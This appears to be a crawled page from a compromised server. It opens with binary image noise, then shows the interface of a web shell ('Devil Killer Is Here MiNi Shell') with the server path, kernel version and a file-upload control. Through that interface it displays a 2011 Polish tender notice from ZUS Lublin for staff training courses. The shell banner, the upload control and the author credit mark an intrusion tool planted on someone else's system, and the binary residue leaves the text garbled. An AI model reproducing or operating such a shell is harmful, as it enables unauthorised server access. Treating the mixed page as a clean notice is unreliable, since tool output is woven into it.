JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111103/363654-N-2011.html

<p class="kh_header"><b>Lublin: Organizacja   szkoleń  dla  pracowników  Oddziału ZUS  w Lublinie</b><br>
<b>Numer ogłoszenia: 363654 - 2011; data zamieszczenia: 03.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Lublinie , ul. Tomasza Zana 36,38c, 20-601 Lublin, woj. lubelskie, tel. 081 5357402, faks 081 5357402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja   szkoleń  dla  pracowników  Oddziału ZUS  w Lublinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia , o wartości szacunkowej poniżej 125 000 tys. euro, jest usługa obejmująca organizację i przeprowadzenie szkoleń dla pracowników Oddziału   ZUS w Lublinie.  Przedmiot zamówienia podzielono na 2 niżej opisane części: 
1.1. Część 1, na którą  składa się 3 nw. zadania:
a)  Zadanie 1 - szkolenie nt.:  >Techniki obsługi klientów z uwzględnieniem specyfiki klientów Zakładu<:
-  uczestnicy szkolenia: pracownicy komórek obsługi klientów i korespondencji - front- office,
-  miejsce szkolenia:  Lublin i  Radzyń Podlaski,  
-  ilość uczestników: ok. 112  osób,  
- ilość grup szkoleniowych:  8 (w tym: 6 grup w Lublinie, 2 grupy w Radzyniu Podlaskim),

b) Zadanie 2 - szkolenie nt.:  >Prezentacja i autoprezentacja podczas wystąpień publicznych<
- Program szkolenia powinien  uwzględniać m.in. następujące zagadnienia: jak minimalizować tremę; jak dobrać ubiór do miejsca, charakteru prezentacji i oczekiwań odbiorców (publiczności); elementy nauki komponowania przemówień i tworzenia prezentacji; skupiania i utrzymywania na sobie uwagi słuchaczy; mowa ciała, modulowanie głosu, efektowne i efektywne zakończenia oraz inne elementy zaproponowane przez wykonawcę,
- uczestnicy szkolenia: pracownicy reprezentujący Oddział podczas szkoleń, konferencji, spotkań,
-  miejsce szkolenia: Nałęczów lub Kazimierz Dolny , 
-  ilość uczestników: ok. 29 osób,   
-  ilość grup szkoleniowych:  2 ,   
- nocleg: 1 nocleg (z kolacją i śniadaniem) w hotelu o kategorii minimum trzygwiazdkowej,

 c) Zadanie 3 - szkolenie nt.:  >Motywowanie pracowników<
- uczestnicy szkolenia: kadra kierownicza,
- miejsce szkolenia: Lublin ,  
- ilość uczestników: ok. 15 osób,  
- ilość grup szkoleniowych:  1  

1.2. Część 2  przedmiotu zamówienia, którą  stanowi:
 a) zadanie nr 4 - szkolenie  nt.:  >Microsoft Excel  - poziom średnio zaawansowany<:
- uczestnicy szkolenia: pracownicy Oddziału,
-  miejsce szkolenia: Lublin , 
- ilość uczestników: ok. 37 osób,  
- ilość grup szkoleniowych:  3, 
 b) Zadanie  5 - szkolenie obejmujące następujące tematy:
1) MS 10265 Programowanie rozwiązań dostępu do danych z Microsoft Visual Studio 2010 - ilość uczestników: 3 osoby, 
2) MS 10267 Wprowadzenie do oprogramowania Web z Microsoft Visual Studio 2010 - ilość uczestników: 3 osoby, 
3) MS 2310 Projektowanie aplikacji webowych z Microsoft Visual Studio 2008 SP1 - ilość uczestników: 3 osoby, 
4) MS 2784 Strojenie i optymalizowanie zapytań z użyciem Microsoft SQL Server 2005 - ilość uczestników: 3 osoby, 
5) MS 6463 Visual Studio 2008: ASP.NET 3.5 - ilość uczestników: 3 osoby, 
6) MS 6464 Visual Studio 2008: ADO.NET 3.5 - ilość uczestników: 3 osoby, 
7) MS 50414 - Microsoft Windows PowerShell v2 For Administrators - ilość uczestników: 1 osoba, 
8) MS 6451 - Planning, Deploying and Managing Systems Center Configuration Manager 2007 -  ilość  uczestników: 1 osoba, 
- miejsce szkolenia: Lublin  
- uczestnicy szkolenia: pracownicy Centrum Wsparcia Informatyki
1.3.  Wymagane warunki wspólne dla  zadań w części 1 i części 2 zamówienia:
a)  liczebność grupy szkoleniowej nie więcej niż 15 osób (nie dotyczy zadania 5),
b)  lokalizacja sali szkoleniowej   zapewniającej należytą realizację zamówienia - zaproponowana w ofercie  przez  wykonawcę usługi ,
c)  termin szkolenia : od daty zawarcia umowy do 28.12.2011r. 
d)  czas trwania szkolenia: 16 godzin dydaktycznych (16 x 45 minut) tj. 2 dni robocze (nie dotyczy zadania 5, w którym czas szkolenia ustalony jest przez Wykonawcę stosownie do tematu), 
e) catering: przerwy kawowe, obiad dla wszystkich uczestników szkolenia (nie dotyczy zadania 5), 
f)  materiały szkoleniowe dla  wszystkich uczestników szkolenia,
g)  certyfikaty ukończenia szkolenia dla wszystkich uczestników

2.Zamawiający dopuszcza składanie ofert częściowych na dowolna ilość ww. części

 Uwaga! Wszystkie postanowienia  ogłoszenia dotyczą każdej  części przedmiotu zamówienia , chyba  że treść postanowienia stanowi inaczej.

3.WSPÓLNY SŁOWNIK ZAMÓWIEŃ:  Kody CPV:  80500000-9 Usługa szkoleniowa
4. Nie dopuszcza się możliwości składania ofert  wariantowych.
5. Nie przewiduje się zamówień  uzupełniających, o których mowa w art. 67 ust.  1 pkt 6   i 7 lub art. 134 ust. 6 pkt 3 i 4 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych ( Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.),  zwanej dalej  >ustawą<.
6. Wniesienie wadium nie  jest wymagane.
7.Wymagany termin wykonania zamówienia: od daty zawarcia umowy do 28 grudnia 2011r. zgodnie ze szczegółowym harmonogramem przedstawionym przed datą zawarcia umowy przez wybranego  Wykonawcę   i  zaakceptowanym przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wniesienie wadium nie  jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek,  jeśli  wykonał  należycie w okresie ostatnich trzech  lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,   co najmniej 2.  usługi  (każda na podstawie odrębnej umowy)  w zakresie niezbędnym do wykazania wiedzy  i doświadczenia,    tj. co najmniej 2 usługi szkoleniowe o zbliżonym zakresie do tematyki każdego zadania  objętego zamówieniem  dla grupy szkoleniowej  liczącej co najmniej 15 osób (w zadaniu 5  nie ma warunku liczebności grupy) .  Na potwierdzenie spełnienia tego warunku Wykonawca złoży wykaz usług   (wg wzoru załączonego do SIWZ) spełniających powyższy opis z podaniem ich rodzaju i wartości oraz daty i miejsca wykonywania  a także załączy dokumenty  potwierdzające, że usługi  zawarte  w wykazie zostały wykonane  należycie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli zaś w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1, wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione  z  datą wymaganą  dla tych dokumentów (6 miesięcy przed upływem terminu składania ofert). 

2. W przypadku oferty wspólnej  spełnianie  warunków  udziału, o których mowa w pkt. III.3, będzie oceniane łącznie, natomiast brak podstaw do wykluczenia musi wykazać  każdy ze wspólników poprzez złożenie dokumentów,  o których mowa w pkt. III.4.2.

3. Jeżeli  wykonawca nie spełnia samodzielnie warunków udziału w postępowaniu  a  wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach (wiedzy  i  doświadczeniu , potencjale  technicznym, osobach  zdolnych do wykonania zamówienia lub zdolnościach finansowych)  innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy.  zobowiązany jest udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia , w szczególności załączając  do oferty pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.    W przypadku, gdy  podmioty,  z których zasobów korzysta wykonawca,  będą brały udział w realizacji części zamówienia, wykonawca zobowiązany jest złożyć wraz  z ofertą również  dokumenty wymienione   w pkt. III.4.2 w odniesieniu do tych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość  dokonywania zmian istotnych postanowień zawartej umowy  w stosunku do treści oferty (w szczególności terminów realizacji przedmiotu umowy)  w sytuacjach opisanych w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, ZUS Oddział w Lublinie, 20-601 Lublin,  ul. T. Zana 38C , piętro IX,  pokój   nr 914 - budynek  38C  lub otrzymać  pocztą..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2011 godzina 12:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, piętro IX, pok. 914-budynek  38C..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.  SIWZ zamieszczona będzie na stronie internetowej  Zamawiającego: www.zus.pl od dnia zamieszczenia  ogłoszenia  w Biuletynie Zamówień Publicznych (ogłoszenie będzie opublikowane w dniu  03.11.2011r.  na portalu UZP)  do upływu terminu składania ofert.

2.  SIWZ w wersji papierowej /bezpłatna/  można odebrać  osobiście w siedzibie Zamawiającego, ZUS Oddział w Lublinie, 20-601 Lublin,  ul. T. Zana 38C , piętro IX,  pokój   nr 914 - budynek  38C  lub otrzymać  pocztą. 

3. Pracownikiem   uprawnionym  do kontaktów z wykonawcami  jest  Włodzimierz Koczkodaj   tel/fax: (81) 535-77-94.

4.   Otwarcie ofert nastąpi w dniu 14.11.2011r.  o godzinie 12:30 w siedzibie
     Zamawiającego, piętro IX, pok. 914-budynek  38C

5.  Termin związania ofertą - 30 dni od daty składania ofert -  bieg terminu związania   ofertą rozpoczyna się wraz z upływem terminu składania ofert.

6. Zamawiający nie przewiduje zawarcia umowy ramowej.

7.  Ustanawianie dynamicznego systemu zakupów - nie dotyczy niniejszego zamówienia.

8.  Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia,   o których mowa w art. 151a ustawy.

9. Zamawiający nie przewiduje wymagań związanych z realizacją zamówienia (o których mowa   w art. 29 ust. 4 ustawy), tj. dotyczących zatrudnienia osób bezrobotnych   i młodocianych w celu przygotowania zawodowego, niepełnosprawnych i innych, o których mowa w przepisach                                o zatrudnieniu socjalnym lub we właściwych przepisach państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego. 

10. Zamawiający ustala faksową (nr faksu: 81 535-77-94) formę przekazywania informacji,  oświadczeń, wniosków, zawiadomień; przy czym każda ze stron, na żądanie drugiej, potwierdzi niezwłocznie fakt otrzymania korespondencji. Niezależnie od powyższego ustalenia zawsze dopuszczalna jest forma pisemna z zastrzeżeniem wyjątków przewidzianych w ustawie.  W zakresie  określonym ustawą, Zamawiający będzie zamieszczał  dokumenty i informacje dotyczące niniejszego postępowania  na stronie internetowej   www.zus.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenia nieinformatyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

a)  Zadanie 1 - szkolenie nt.:  >Techniki obsługi klientów z uwzględnieniem specyfiki klientów Zakładu<:
-  uczestnicy szkolenia: pracownicy komórek obsługi klientów i korespondencji - front- office
         -  miejsce szkolenia:  Lublin i  Radzyń Podlaski,  
         -  ilość uczestników: ok. 112  osób,  
          - ilość grup szkoleniowych:  8   (w tym: 6 grup w Lublinie, 2 grupy w Radzyniu Podlaskim)

           b) Zadanie 2 - szkolenie nt.:  >Prezentacja i autoprezentacja podczas wystąpień publicznych<
- Program szkolenia powinien  uwzględniać m.in. następujące zagadnienia: jak minimalizować tremę; jak dobrać ubiór do miejsca, charakteru prezentacji i oczekiwań odbiorców (publiczności); elementy nauki komponowania przemówień i tworzenia prezentacji; skupiania i utrzymywania na sobie uwagi słuchaczy; mowa ciała, modulowanie głosu, efektowne i efektywne zakończenia oraz inne elementy zaproponowane przez wykonawcę,
  - uczestnicy szkolenia: pracownicy reprezentujący Oddział podczas szkoleń, konferencji, spotkań,
  -  miejsce szkolenia: Nałęczów lub Kazimierz Dolny , 
  -  ilość uczestników: ok. 29 osób,   
  -  ilość grup szkoleniowych:  2 ,   
   - nocleg: 1 nocleg (z kolacją i śniadaniem) w hotelu o kategorii minimum trzygwiazdkowej,

 c) Zadanie 3 - szkolenie nt.:  >Motywowanie pracowników<
- uczestnicy szkolenia: kadra kierownicza,
- miejsce szkolenia: Lublin ,  
- ilość uczestników: ok. 15 osób,  
- ilość grup szkoleniowych:   1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Atrakcyjność  programu szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenia informatyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

a) zadanie   4 - szkolenie  nt.:  >Microsoft Excel  - poziom średnio zaawansowany<:
 - uczestnicy szkolenia: pracownicy Oddziału,
 -  miejsce szkolenia: Lublin , 
-   ilość uczestników: ok. 37 osób,  
-   ilość grup szkoleniowych:  3, 
 b) Zadanie  5 - szkolenie obejmujące następujące tematy:
1) MS 10265 Programowanie rozwiązań dostępu do danych z Microsoft Visual Studio 2010 - ilość uczestników: 3 osoby, 
2) MS 10267 Wprowadzenie do oprogramowania Web z Microsoft Visual Studio 2010 - ilość uczestników: 3 osoby, 
3) MS 2310 Projektowanie aplikacji webowych z Microsoft Visual Studio 2008 SP1 - ilość uczestników: 3 osoby, 
4) MS 2784 Strojenie i optymalizowanie zapytań z użyciem Microsoft SQL Server 2005 - ilość uczestników: 3 osoby, 
5) MS 6463 Visual Studio 2008: ASP.NET 3.5 - ilość uczestników: 3 osoby, 
6) MS 6464 Visual Studio 2008: ADO.NET 3.5 - ilość uczestników: 3 osoby, 
7) MS 50414 - Microsoft Windows PowerShell v2 For Administrators - ilość uczestników: 1 osoba, 
8) MS 6451 - Planning, Deploying and Managing Systems Center Configuration Manager 2007 -  ilość  uczestników: 1 osoba, 
- miejsce szkolenia: Lublin  
- uczestnicy szkolenia: pracownicy Centrum Wsparcia Informatyki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com